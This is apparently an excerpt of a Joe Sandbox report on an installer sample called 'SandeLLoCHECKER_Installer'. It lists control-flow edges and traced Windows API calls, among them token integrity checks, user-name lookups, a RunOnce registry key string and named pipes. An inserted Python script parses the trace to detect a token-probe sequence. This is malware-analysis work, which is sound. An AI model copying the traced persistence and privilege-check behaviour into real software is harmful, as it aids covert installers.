50557->50559 50560 861a20 112 API calls 50558->50560 50559->50552 50564 84abe0 50 API calls 50559->50564 50561 87bf37 50560->50561 50562 87bf5b 50561->50562 50563 861a20 112 API calls 50561->50563 50566 8481d0 39 API calls 50562->50566 50565 87bf4c 50563->50565 50567 87c06e 50564->50567 50568 861a20 112 API calls 50565->50568 50569 87bf98 50566->50569 50567->50552 50570 84abe0 50 API calls 50567->50570 50568->50562 50571 87c099 50570->50571 50571->50552 50572 87c09d 50571->50572 50573 862300 40 API calls 50572->50573 50574 87c0bc 50573->50574 50575 862300 40 API calls 50574->50575 50576 87c0c7 50575->50576 50577 862300 40 API calls 50576->50577 50578 87c0d2 50577->50578 50579 862300 40 API calls 50578->50579 50580 87c0ef 50579->50580 50588 87df30 RtlAllocateHeap RaiseException 50580->50588 50582 87c0fb 50584 9b3587 50583->50584 50586 87bda4 50584->50586 50589 9b3630 50584->50589 50586->50534 50586->50535 50587->50525 50588->50582 50590 9b367f CreateFileW 50589->50590 50591 9b367d 50589->50591 50592 9b369f 50590->50592 50591->50590 50603 861990 50592->50603 50594 9b36ce std::locale::_Setgloballocale 50595 9b371a WriteFile 50594->50595 50596 9b3737 50594->50596 50595->50594 50595->50596 50597 9b3767 std::ios_base::_Ios_base_dtor 50596->50597 50600 9b37bd 50596->50600 50598 9b379b CloseHandle 50597->50598 50599 9b37a9 50597->50599 50598->50599 50599->50586 50601 a1b22f std::_Throw_Cpp_error 38 API calls 50600->50601 50602 9b37c2 50601->50602 50604 861a03 50603->50604 50605 8619a0 50603->50605 50620 847bb0 39 API calls std::_Throw_Cpp_error 50604->50620 50607 8619d6 50605->50607 50608 8619a8 50605->50608 50609 8619f2 50607->50609 50612 a15dd9 std::_Facet_Register 2 API calls 50607->50612 50610 861a08 50608->50610 50611 8619af 50608->50611 50609->50594 50621 848730 39 API calls 3 library calls 50610->50621 50614 a15dd9 std::_Facet_Register 2 API calls 50611->50614 50615 8619e0 50612->50615 50616 8619b5 50614->50616 50615->50594 50617 8619be 50616->50617 50618 a1b22f 
std::_Throw_Cpp_error 38 API calls 50616->50618 50617->50594 50619 861a12 50618->50619 50621->50616 50622 984bc0 50668 984ff0 RtlAllocateHeap RaiseException 50622->50668 50624 984c0d 50669 988310 97 API calls 50624->50669 50626 984c2f 50670 95bcc0 50626->50670 50629 862300 40 API calls 50639 984c51 50629->50639 50630 984cbb 50632 984f0a 50630->50632 50633 984ccf 50630->50633 50631 984f1e 50635 84a8a0 2 API calls 50631->50635 50634 84a8a0 2 API calls 50632->50634 50754 960050 101 API calls 3 library calls 50633->50754 50637 984f14 50634->50637 50638 984f28 50635->50638 50641 84a8a0 2 API calls 50637->50641 50639->50630 50639->50631 50753 862420 40 API calls 50639->50753 50640 984ce0 50643 861a20 112 API calls 50640->50643 50641->50631 50644 984cf1 50643->50644 50645 984d08 50644->50645 50646 84abe0 50 API calls 50644->50646 50645->50644 50647 984d15 50646->50647 50647->50637 50648 984d1f 50647->50648 50649 984d48 50648->50649 50650 984d3d 50648->50650 50755 949600 50649->50755 50652 84a190 47 API calls 50650->50652 50655 984d46 50652->50655 50653 984d52 _wcsrchr 50654 984d8c 50653->50654 50653->50655 50656 984da0 50654->50656 50680 984ff0 RtlAllocateHeap RaiseException 50654->50680 50655->50653 50655->50654 50767 95be30 40 API calls 3 library calls 50655->50767 50656->50654 50659 984d81 50660 861a20 112 API calls 50659->50660 50660->50654 50661 984db1 50665 984dbd ___std_exception_copy 50661->50665 50681 988600 50661->50681 50667 984e27 ___std_exception_copy 50665->50667 50768 9866e0 50665->50768 50668->50624 50669->50626 50671 95bd05 50670->50671 50672 84abe0 50 API calls 50671->50672 50674 95bd22 50671->50674 50673 95bd15 50672->50673 50673->50674 50675 95bd65 50673->50675 50855 946da0 50674->50855 50676 84a8a0 2 API calls 50675->50676 50678 95bd6f 50676->50678 50679 95bd4f 50679->50629 50680->50661 50682 988ea7 50681->50682 50698 98865a std::ios_base::_Ios_base_dtor 50681->50698 50684 a15d9a _ValidateLocalCookies 5 API calls 50682->50684 50683 84abe0 50 API calls 
[Control-flow graph: the basic-block edge list of this function and its callees is only legible in the interactive report and is omitted here. Blocks that call an API, by address:]
• 988a70 FindFirstFileW; 988ac9 FindClose; 987566 FindFirstFileW
• 9890bd CreateFileW; 98912d SetFilePointer SetEndOfFile; 989156 CloseHandle; 952052 CreateFileW; 951ef0 PathIsUNCW
• 96113b CreateFileW; 96119c GetFileSize; 9611c4 CloseHandle; 961024 CreateDirectoryW; 961038 GetLastError; 960f69 / 960d32 PathIsUNCW
• 992e51 GetDiskFreeSpaceExW; 9fbfac SetFilePointer
• 94960d / 949640 MultiByteToWideChar; 946eed GetLastError
• 987e64 CreateEventW; 987e9d CreateThread; 987edd WaitForSingleObject GetExitCodeThread; 987f1c / 987f3d / 987f7a / 987fa2 / 9881e0 CloseHandle
• 9a59f8 CreateEventW; 9a5a26 CreateThread; 9a5b3d WaitForSingleObject GetExitCodeThread; 9a5b6a CloseHandle; 9a5bd1 WaitForSingleObject
• 84f691 / 84f72c LoadLibraryW GetProcAddress; 84f71a RoGetActivationFactory; 84f81f LoadLibraryW; 84f86e GetProcAddress; 84f8bd FreeLibrary
• 84a4f0 / 941ee0 / 985260 RtlAllocateHeap RaiseException; a03e30 RaiseException; a17b2a Concurrency::cancel_current_task RaiseException
• a2f4be EnterCriticalSection; a1f8d5 IsProcessorFeaturePresent; 8a8089 / 88e399 / 88de4b / 8a6e1b / 8a725b / 8a82f9 InterlockedPushEntrySList
• 8596a6 CallWindowProcW; 8596bc GetWindowLongW CallWindowProcW; 8596f0 GetWindowLongW; 8596fd SetWindowLongW
APIs
  • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
• GetTickCount.KERNEL32 ref: 0097A8D4
• __Xtime_get_ticks.LIBCPMT ref: 0097A8DC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097A926
• __Init_thread_footer.LIBCMT ref: 0097AB11
• GetCurrentProcess.KERNEL32(00000008,?,C7BA013E), ref: 0097AD08
• OpenProcessToken.ADVAPI32(00000000), ref: 0097AD0F
• GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0097AD3E
• CloseHandle.KERNEL32(00000000), ref: 0097AD53
  • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
  • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
  • Part of subcall function 00965C40: __Init_thread_footer.LIBCMT ref: 00965CB6
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0097B515
• CreateThread.KERNEL32(00000000,00000000,0097C020,?,00000000,?), ref: 0097B550
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 0097B583
  • Part of subcall function 0097E460: GetCurrentProcess.KERNEL32(?,C7BA013E), ref: 0097E4C9
  • Part of subcall function 0097E460: IsWow64Process.KERNEL32(00000000), ref: 0097E4D0
  • Part of subcall function 0097E460: _wcsrchr.LIBVCRUNTIME ref: 0097E551
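The API list above is the kind of trace an analyst wants to query mechanically rather than read. As an added example, not part of the Joe Sandbox report and not the sample's own code, the following Python parses those bullet lines into records and flags the GetCurrentProcess -> OpenProcessToken -> GetTokenInformation(TokenIntegrityLevel) -> CloseHandle chain, which is how a process learns its own token's integrity level before deciding, for instance, whether it still needs to elevate. The input string is the APIs list copied from this page; the line grammar is inferred from those entries only, and the function names, the dataclass and the `window` bound are choices made for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# The "APIs" bullet list copied verbatim from the report section above (not constructed).
REPORT_APIS = """\
• Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
• Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
• Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
• GetTickCount.KERNEL32 ref: 0097A8D4
• __Xtime_get_ticks.LIBCPMT ref: 0097A8DC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097A926
• __Init_thread_footer.LIBCMT ref: 0097AB11
• GetCurrentProcess.KERNEL32(00000008,?,C7BA013E), ref: 0097AD08
• OpenProcessToken.ADVAPI32(00000000), ref: 0097AD0F
• GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0097AD3E
• CloseHandle.KERNEL32(00000000), ref: 0097AD53
• Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
• Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
• Part of subcall function 00965C40: __Init_thread_footer.LIBCMT ref: 00965CB6
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0097B515
• CreateThread.KERNEL32(00000000,00000000,0097C020,?,00000000,?), ref: 0097B550
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 0097B583
• Part of subcall function 0097E460: GetCurrentProcess.KERNEL32(?,C7BA013E), ref: 0097E4C9
• Part of subcall function 0097E460: IsWow64Process.KERNEL32(00000000), ref: 0097E4D0
• Part of subcall function 0097E460: _wcsrchr.LIBVCRUNTIME ref: 0097E551
"""

# Grammar inferred from the lines above: an optional "Part of subcall function X:" prefix,
# then NAME.MODULE, an optional "(args)" list, and the call-site address after "ref:".
_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\),?)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int               # call-site address (the report's "ref:")
    parent: Optional[int]  # set when the report marks the call as part of a subcall


def split_args(s: str) -> List[str]:
    """Split an argument list on top-level commas; keeps annotations such as
    '00000014(TokenIntegrityLevel)' intact."""
    out, cur, depth = [], "", 0
    for ch in s:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            out.append(cur)
            cur = ""
        else:
            cur += ch
    if cur or out:
        out.append(cur)
    return out


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):
            continue
        m = _LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        parent = m.group("parent")
        calls.append(ApiCall(m.group("name"), m.group("module"),
                             split_args(m.group("args") or ""),
                             int(m.group("ref"), 16),
                             int(parent, 16) if parent else None))
    return calls


TOKEN_PROBE = ("GetCurrentProcess", "OpenProcessToken", "GetTokenInformation", "CloseHandle")


def find_token_probe(calls: List[ApiCall], window: int = 8) -> Optional[List[int]]:
    """Return the call-site addresses of the first GetCurrentProcess -> OpenProcessToken ->
    GetTokenInformation(...TokenIntegrityLevel...) -> CloseHandle chain among the function's
    own (non-subcall) calls, taken in address order and within `window` calls of each other."""
    own = sorted((c for c in calls if c.parent is None), key=lambda c: c.ref)
    for i in range(len(own)):
        matched, j = [], i
        for want in TOKEN_PROBE:
            while j < len(own) and j - i < window and own[j].name != want:
                j += 1
            if j >= len(own) or j - i >= window:
                break
            if want == "GetTokenInformation" and not any("TokenIntegrityLevel" in a for a in own[j].args):
                break
            matched.append(own[j].ref)
            j += 1
        else:
            return matched
    return None


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_APIS)
    hit = find_token_probe(parsed)
    print(f"{len(parsed)} calls parsed; token probe at",
          [f"{a:08X}" for a in hit] if hit else "not found")
```

Subcall entries are kept but excluded from sequence matching, since the report attributes them to a different function; the `window` bound keeps a GetCurrentProcess at the top of a long function from being paired with an unrelated CloseHandle near its end.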
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: Process$Init_thread_footer$CreateCurrentHeapToken$AllocateCloseCountEventFindHandleInformationObjectOpenResourceSingleThreadTickUnothrow_t@std@@@WaitWow64Xtime_get_ticks__ehfuncinfo$??2@_wcsrchr
• String ID: /uninstall$VersionString$\/:*?"<>|$\\?\$Df
• API String ID: 2945862171-337833427
• Opcode ID: 4234a8528cec0eb61d21bb93d73aa092864cdb8595e4940c5d5eff13ed7803f6
• Instruction ID: 51f5a60fc0fcbbf4a3457e5874a2bf5a4e9a413ceefee26ba8967ffd85e1a0b3
• Opcode Fuzzy Hash: 4234a8528cec0eb61d21bb93d73aa092864cdb8595e4940c5d5eff13ed7803f6
• Instruction Fuzzy Hash: ABB2E172A00609DFDB14DFA8C845BAEBBB8FF44314F148269E419EB2D1DB74AD05CB91

                                                                                                                        Control-flow Graph (graph image not reproduced)
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,C7BA013E,00000000,000000B8,?,?,?,?,?,?,?,?,?,?,C7BA013E), ref: 0084F69B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0084F6A1
                                                                                                                        • LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,00AAA29C,00000000,00000000,00000000), ref: 0084F82B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$AddressProc
                                                                                                                        • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                                        • API String ID: 1469910268-2454113998
                                                                                                                        • Opcode ID: 39d721da6a24502b44f1230139e6d7d6f2b6bb0ff2d3873b9c2c9f3cd0d24a52
                                                                                                                        • Instruction ID: bc12c41af082ef0205cec4191017ea4fd0ddd55365c498bb8361cfbb153f215b
                                                                                                                        • Opcode Fuzzy Hash: 39d721da6a24502b44f1230139e6d7d6f2b6bb0ff2d3873b9c2c9f3cd0d24a52
                                                                                                                        • Instruction Fuzzy Hash: 71B16531D0020DEBDB14DFA8D885BAEBBB4FF58314F20412DE510E72A2EB74A944CB91

                                                                                                                        Control-flow Graph (graph image not reproduced)
                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0099F345
                                                                                                                        • GetLastError.KERNEL32 ref: 0099F34B
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0099F393
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 0099F3C9
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 0099F413
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,C7BA013E), ref: 0099F648
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 0099F882
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 0099F9B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$EnvironmentNameUserVariable$ErrorLast
                                                                                                                        • String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
                                                                                                                        • API String ID: 938064350-4079418357
                                                                                                                        • Opcode ID: bcdfa7985d6a73df2f8da45889e2cee7769d70851480bc9125dce3d3815461c0
                                                                                                                        • Instruction ID: 1b2f2302fcd8d734716af91f79a726577a55d1744bda9caad25f4aadd7f4496b
                                                                                                                        • Opcode Fuzzy Hash: bcdfa7985d6a73df2f8da45889e2cee7769d70851480bc9125dce3d3815461c0
                                                                                                                        • Instruction Fuzzy Hash: C1225A70D00249DFDF14DFA8C999BEEBBB4EF14304F208269E415A7291DB746A88CF91

                                                                                                                        Control-flow Graph (graph image not reproduced)
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0095BF58
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0095BF65
                                                                                                                        • GetLastError.KERNEL32 ref: 0095BF6F
                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0095BF99
                                                                                                                        • GetLastError.KERNEL32 ref: 0095BF9F
                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,?,?,?), ref: 0095BFC5
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0095BFF8
                                                                                                                        • EqualSid.ADVAPI32(00000000,?), ref: 0095C007
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 0095C016
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0095C050
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 695978879-0
                                                                                                                        • Opcode ID: 7f9cd9618c469662e64e50daf8007e12496c14b4951bb69e6b1ee1bf820d009b
                                                                                                                        • Instruction ID: 55767ce231d856991f59d53b617df521a47e83a03ffe50dc6a9d2ac47cfd407f
                                                                                                                        • Opcode Fuzzy Hash: 7f9cd9618c469662e64e50daf8007e12496c14b4951bb69e6b1ee1bf820d009b
                                                                                                                        • Instruction Fuzzy Hash: 5A4129B1900209EFDF10DFA5CD49BEEBBB8EF09315F104025E811B3290EB799909DB64

                                                                                                                        Control-flow Graph (graph image not reproduced)
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • CloseHandle.KERNEL32(80004005,C7BA013E,74DF34C0,00000000), ref: 009881E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$CloseHandleHeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2534622057-0
                                                                                                                        • Opcode ID: 70c394e63fe736efa25b30e9726ea3f2e9b863392db2f366440ccc312ff8aa13
                                                                                                                        • Instruction ID: 0133c5eec1cd49ca2a4a6c08831343f8325f138cd642285f58a10b9bd9e2a234
                                                                                                                        • Opcode Fuzzy Hash: 70c394e63fe736efa25b30e9726ea3f2e9b863392db2f366440ccc312ff8aa13
                                                                                                                        • Instruction Fuzzy Hash: 8682CBB0904658CFDB20DF68CD4479EBBB4AF46314F2482D9D548AB382DB749E85CF91
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(?,00000000,?,00000100), ref: 00968ABC
                                                                                                                        • LoadStringW.USER32(?,00000000,?,00000001), ref: 00968BDD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2948472770-0
                                                                                                                        • Opcode ID: 2bce51bea004eb438d1073bdf79345b1ba8a937758099cc6417f3b700bd53032
                                                                                                                        • Instruction ID: b858472d6435a87d6a81fb6df39993dd31bd6a4f9be6cbf8f145f747afe4b250
                                                                                                                        • Opcode Fuzzy Hash: 2bce51bea004eb438d1073bdf79345b1ba8a937758099cc6417f3b700bd53032
                                                                                                                        • Instruction Fuzzy Hash: 06C18E71D00249DBDB04DFA8CD45BEEBBB5FF44304F148329E415AB280EB786A85CB91
                                                                                                                        APIs
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00992E6A
                                                                                                                        Strings
Similarity
• API ID: DiskFreeSpace
• String ID: \$\$\
• API String ID: 1705453755-3791832595
• Opcode ID: 117d2dccee2cd864cb2b8bcc41c8ef71172182aa199b5683cb5a86cd9760591d
• Instruction ID: 9522544773dc387b097db8470e0a0c97d2450cca7dcfe051cb256aa8db3b62a0
• Opcode Fuzzy Hash: 117d2dccee2cd864cb2b8bcc41c8ef71172182aa199b5683cb5a86cd9760591d
• Instruction Fuzzy Hash: 0741D122E04315DBCF30DFA88484AABB3E8FF98354F154A2EE8C897140E7208DC583C6
APIs
• GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0091D941
  • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
  • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
• LoadLibraryExW.KERNEL32(?,00000000,00000000,00A7402D,000000FF), ref: 0091DA14
Strings
Similarity
• API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
• String ID: UxTheme.dll
• API String ID: 2586271605-352951104
• Opcode ID: cc8de62d3ba334beaf691845356f28f3e4dd0b41675c8e48d7f520fbd5c36968
• Instruction ID: f6576cd75a6a1bf4bfe01be96208466e727a8f799e237cd6cb9fdda9faf55e3f
• Opcode Fuzzy Hash: cc8de62d3ba334beaf691845356f28f3e4dd0b41675c8e48d7f520fbd5c36968
• Instruction Fuzzy Hash: 24A1ACB0601649EFE714CF68C818BDABBF4FF04318F24865DD4199B681D7BAA619CF81
APIs
• CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,C7BA013E,C7BA013E,?,?,?,?,00000000), ref: 009A09F9
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,C7BA013E,C7BA013E,?,?,?,?,00000000,00A8BD55), ref: 009A0A1A
Similarity
• API ID: Create$FileNamedPipe
• String ID:
• API String ID: 1328467360-0
• Opcode ID: f877811203bf0ba5d115a1b3a30c28f7e44d486a23518ec9584a8c970c3857ae
• Instruction ID: df6e983f932a30340201bbaa5b6dd51d850e4b3958c8e61738cd29835716bf90
• Opcode Fuzzy Hash: f877811203bf0ba5d115a1b3a30c28f7e44d486a23518ec9584a8c970c3857ae
• Instruction Fuzzy Hash: E3310631A84745BFE731CF14CC05B9ABBA8EB01730F10826EF9A9976D0DB71A940CB94
APIs
• __set_se_translator.LIBVCRUNTIME ref: 0087BBB8
• SetUnhandledExceptionFilter.KERNEL32(0095F970), ref: 0087BBCE
Similarity
• API ID: ExceptionFilterUnhandled__set_se_translator
• String ID:
• API String ID: 2480343447-0
• Opcode ID: 3be488da31cd116897f58f4c15ab916d3c022e0061535c5cb882f279e64a3ede
• Instruction ID: c46ae0b58e5b2406b3b6eff8f647bb5ed8e1ecbdbd448ffcfa45379c9ad17006
• Opcode Fuzzy Hash: 3be488da31cd116897f58f4c15ab916d3c022e0061535c5cb882f279e64a3ede
• Instruction Fuzzy Hash: 91E02622A04340BECA10D360AC09F4E3F50FBD2B25F088065FA0053161CB71984883A1
APIs
  • Part of subcall function 009659D0: __Init_thread_footer.LIBCMT ref: 00965AB0
• CoCreateInstance.COMBASE(00AAA0D8,00000000,00000001,00AC75E0,000000B0), ref: 009AAE8E
Similarity
• API ID: CreateInit_thread_footerInstance
• String ID:
• API String ID: 3436645735-0
